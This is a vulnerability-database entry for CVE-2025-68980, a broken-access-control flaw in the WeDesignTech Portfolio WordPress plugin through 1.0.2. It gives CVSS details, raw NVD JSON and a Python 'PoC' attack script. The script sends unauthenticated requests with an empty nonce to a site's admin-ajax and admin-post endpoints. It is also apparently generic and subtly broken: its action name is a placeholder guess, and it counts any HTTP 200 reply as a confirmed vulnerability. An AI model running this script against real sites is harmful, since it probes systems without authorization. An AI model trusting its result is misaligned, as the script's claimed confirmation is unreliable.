Security Vulnerability Report
中文
CVE-2025-68980 CVSS 5.3 MEDIUM

CVE-2025-68980

Published: 2025-12-30 11:15:57
Last Modified: 2026-04-27 19:16:39

Description

Missing Authorization vulnerability in designthemes WeDesignTech Portfolio wedesigntech-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WeDesignTech Portfolio: from n/a through <= 1.0.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WeDesignTech Portfolio (wedesigntech-portfolio) <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68980 PoC - WeDesignTech Portfolio Broken Access Control # Affected Version: <= 1.0.2 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def exploit_unauthorized_access(): """ Exploit for Missing Authorization vulnerability in WeDesignTech Portfolio plugin. This PoC demonstrates how an unauthenticated attacker can access admin functions. """ # Common vulnerable endpoints in WordPress plugins vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-admin/admin-post.php" ] # Identify the vulnerable action based on plugin's registered AJAX hooks # Common patterns: wedesigntech_portfolio_*, portfolio_*, wdt_* payload = { "action": "wedesigntech_portfolio_action", # Replace with actual action name "portfolio_id": "1", "_wpnonce": "" # Empty nonce - exploiting missing verification } print(f"[*] Target: {TARGET_URL}") print(f"[*] Exploiting CVE-2025-68980...") for endpoint in vulnerable_endpoints: try: response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Potential vulnerability confirmed at: {endpoint}") print(f"[+] Response: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") print("[-] No vulnerable endpoint found or target not affected") return False def check_version(): """ Check if target is running vulnerable version. """ readme_url = f"{TARGET_URL}/wp-content/plugins/wedesigntech-portfolio/readme.txt" try: response = requests.get(readme_url, timeout=10) if response.status_code == 200: if "1.0.2" in response.text or "1.0.1" in response.text: print("[!] Target appears to be running vulnerable version") return True except: pass return False if __name__ == "__main__": print("CVE-2025-68980 PoC - WeDesignTech Portfolio Broken Access Control") print("=" * 60) check_version() exploit_unauthorized_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68980", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:56.613", "lastModified": "2026-04-27T19:16:39.077", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in designthemes WeDesignTech Portfolio wedesigntech-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WeDesignTech Portfolio: from n/a through <= 1.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wedesigntech-portfolio/vulnerability/wordpress-wedesigntech-portfolio-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}